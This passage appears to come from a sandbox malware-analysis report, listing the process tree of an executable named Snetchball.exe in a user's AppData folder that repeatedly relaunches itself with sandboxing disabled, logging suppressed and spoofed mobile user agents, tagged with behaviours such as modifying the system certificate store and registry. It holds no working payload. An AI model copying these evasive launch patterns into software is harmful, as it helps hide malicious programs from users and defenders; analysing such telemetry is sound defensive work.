C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2724,7541734360235849457,10510411150285218548,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; U; Android 10; PPA-LX2 Build/HUAWEIPPA-LX2; wv) AppleWebKit/537.36 (KHTML, like Gecko) Version/4.0 Chrome/78.0.3904.108 Mobile Safari/537.36 OPR/63.0.2254.62316" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:137⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2868,9873114544123078577,11094426257683299939,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2916 /prefetch:239⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2868,9873114544123078577,11094426257683299939,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3144 /prefetch:139⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2928 /prefetch:241⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3208 /prefetch:841⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:141⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=132,6637761510991571119,7416133106245174589,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2872 /prefetch:243⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=132,6637761510991571119,7416133106245174589,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3160 /prefetch:143⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
- Checks computer location settings
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2876 /prefetch:245⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3220 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3084 /prefetch:845⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3716 /prefetch:145⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3604 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
- Modifies Control Panel
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=gpu-process --field-trial-handle=2836,17071936464192567719,2433962225466748195,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --gpu-preferences=MAAAAAAAAADgAAAwAAAAAAAAAAAAAAAAAABgAAAAAAAQAAAAAAAAAAAAAAAAAAAAKAAAAAQAAAAgAAAAAAAAACgAAAAAAAAAMAAAAAAAAAA4AAAAAAAAABAAAAAAAAAAAAAAAAUAAAAQAAAAAAAAAAAAAAAGAAAAEAAAAAAAAAABAAAABQAAABAAAAAAAAAAAQAAAAYAAAA= --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=2880 /prefetch:247⤵
- Modifies registry class
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2836,17071936464192567719,2433962225466748195,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=3 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3196 /prefetch:147⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2836,17071936464192567719,2433962225466748195,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3188 /prefetch:147⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2836,17071936464192567719,2433962225466748195,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3204 /prefetch:847⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"46⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3256 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1164 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2848,2882435619462665048,14797495566978326471,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Android 10; Mobile; rv:106.0) Gecko/106.0 Firefox/106.0" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3436 /prefetch:145⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"44⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=132,6637761510991571119,7416133106245174589,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3172 /prefetch:843⤵
- Modifies system certificate store
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=132,6637761510991571119,7416133106245174589,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3148 /prefetch:143⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"42⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3184 /prefetch:141⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=1164 /prefetch:141⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3720 /prefetch:141⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2884,6898924808534040397,4316778111466721068,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --disable-gpu-compositing --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; arm; Android 12; SM-M015G) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/94.0.4606.85 YaBrowser/21.11.2.21.00 (alpha) SA/3 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3664 /prefetch:141⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"40⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2868,9873114544123078577,11094426257683299939,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --service-sandbox-type=network --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --mojo-platform-channel-handle=3208 /prefetch:839⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe" --type=renderer --no-sandbox --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --field-trial-handle=2868,9873114544123078577,11094426257683299939,131072 --enable-features=CastMediaRouteProvider --disable-features=CalculateNativeWinOcclusion --lang=en-US --log-file="C:\Users\Admin\AppData\Roaming\Snetchball\debug.log" --log-severity=disable --user-agent="Mozilla/5.0 (Linux; Android 11; SM-A505F) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/106.0.0.0 Mobile Safari/537.36" --device-scale-factor=1 --num-raster-threads=1 --renderer-client-id=4 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3136 /prefetch:139⤵
- Checks computer location settings
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"C:\Users\Admin\AppData\Roaming\Snetchball\Snetchball.exe"38⤵
-
